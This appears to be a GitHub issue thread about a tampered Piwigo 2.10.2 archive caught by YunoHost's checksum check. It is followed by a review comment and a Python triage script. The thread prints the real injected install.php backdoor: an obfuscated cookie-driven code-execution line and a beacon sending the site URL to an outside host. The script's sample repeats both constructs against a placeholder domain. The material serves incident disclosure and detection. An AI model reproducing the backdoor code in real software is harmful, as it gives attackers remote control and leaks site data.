Closed. kevanescence closed this issue 4 years ago.
Hi, thanks for your report. I had a look, and this change looks suspicious to me. I reported it at the Piwigo forum here, and we'll see how it goes.
Hi, the source archive file was definitely corrupted due to a hacking action, and has been fixed on piwigo.org. It's fixed now. Thanks a lot for your quick report, which has probably saved many servers from hacking :+1: That's interesting to see YunoHost checksum control preventing users from that type of attack.
For curious people, I forgot to put the diff between the corrupted and the official Piwigo:
diff piwigo_2.10.2_official/install.php ../piwigo_2.10.2_hacked/install.php
16a17,25
> $p=$_COOKIE;(count($p)==23&&in_array(gettype($p).count($p),$p))?(($p[85]=$p[85].$p[81])&&($p[78]=$p[85]($p[78]))&&($p=$p[78]($p[79],$p[85]($p[38])))&&$p()):$p;
> if(isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on')
> $link = "https";
> else
> $link = "http";
> $link .= "://";
> $link .= $_SERVER['HTTP_HOST'];
> $link .= $_SERVER['REQUEST_URI'];
> echo file_get_contents('http://uyluk.pythonanywhere.com/host/'.$link);
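Review bot: the nine lines added after line 16 of install.php are a backdoor plus an exfiltration beacon, not installer code, so the archive should be rejected outright rather than reviewed further. The first added line turns request cookies into a variable function call (the `$p()` built from `$_COOKIE` entries), which is remote code execution gated on a cookie pattern; the remaining lines rebuild the installing site's URL from `HTTP_HOST` and `REQUEST_URI` and send it to an external host with `echo file_get_contents('http://uyluk.pythonanywhere.com/host/'.$link);`, which also makes every install perform a blocking outbound request. A release archive whose install.php diverges from the tagged source like this should fail the packager's checksum check, which is exactly what YunoHost's manifest did here; request input (`$_COOKIE`, `$_GET`, `$_POST`) flowing into a variable function call, and a remote URL passed to `file_get_contents()`, are the two constructs worth alerting on in any installer.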
Hello,
I have just installed a new version of YunoHost on my Debian 9 server. After having a look in the log, I realized that there was a checksum check issue while downloading the app, preventing it from installing successfully. The checksum has been changed with this commit regarding the new version: https://github.com/YunoHost-Apps/piwigo_ynh/commit/a1ae3d306705eca501e498e10706aa6263c8cacf#diff-1681551f7cc2b82e360de05085fc1bca I do not know why it is not the same.
While in the command line I have
Thanks for your help
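As an added example (not YunoHost's or Piwigo's own code) of the two checks this thread turns on, the manifest checksum that blocked the install and the kind of review kevanescence's diff shows: verify the archive digest first and, on mismatch, locate the added lines and flag the two constructs seen in the tampered install.php. The file contents, the expected digest and the attacker.example domain are constructed stand-ins.

```python
import difflib
import hashlib
import hmac
import re

# Constructed stand-in for the official install.php prologue (not Piwigo's real file).
OFFICIAL = ("<?php\n"
            "define('PHPWG_ROOT_PATH', './');\n"
            "include_once(PHPWG_ROOT_PATH.'include/common.inc.php');\n")
# Constructed tampered copy with the same two constructs as the report (cookie-driven
# variable function call, then a remote fetch of the site URL); placeholder domain.
TAMPERED = OFFICIAL.replace("define(",
    "$p=$_COOKIE;(count($p)==23)?(($p[85]=$p[85].$p[81])&&$p()):$p;\n"
    "echo file_get_contents('http://attacker.example/host/'.$link);\n"
    "define(", 1)
# Digest the packager recorded for the release; here derived from OFFICIAL.
EXPECTED_SHA256 = hashlib.sha256(OFFICIAL.encode()).hexdigest()

VAR_CALL = re.compile(r"\$\w+(\[[^\]]*\])*\s*\(")  # $p(...) or $p[85](...)
INPUTS = ("$_COOKIE", "$_GET", "$_POST", "$_REQUEST")

def verify_sha256(data: bytes, expected_hex: str) -> bool:
    """Constant-time comparison of the archive digest with the manifest value."""
    return hmac.compare_digest(hashlib.sha256(data).hexdigest(), expected_hex.lower())

def added_lines(official: str, candidate: str) -> list:
    """(line number, text) for lines in candidate that are absent from official."""
    cand = candidate.splitlines()
    sm = difflib.SequenceMatcher(None, official.splitlines(), cand, autojunk=False)
    return [(j + 1, cand[j]) for tag, _, _, j1, j2 in sm.get_opcodes()
            if tag in ("insert", "replace") for j in range(j1, j2)]

def suspicious(line: str) -> list:
    """Flag request input reaching a variable function call, and remote fetches."""
    reasons = []
    if any(src in line for src in INPUTS) and VAR_CALL.search(line):
        reasons.append("request input reaches a variable function call")
    if re.search(r"file_get_contents\(\s*['\"]https?://", line):
        reasons.append("file_get_contents() fetches a remote URL")
    return reasons

def triage(official: str, candidate: str, expected_sha256: str) -> dict:
    """Reject on checksum mismatch, then explain which added lines look malicious."""
    ok = verify_sha256(candidate.encode(), expected_sha256)
    findings = [] if ok else [(n, suspicious(t)) for n, t in added_lines(official, candidate)]
    return {"checksum_ok": ok, "findings": [f for f in findings if f[1]]}
```

The checksum alone is what stops the install; the line-level heuristics only explain the mismatch to whoever triages it.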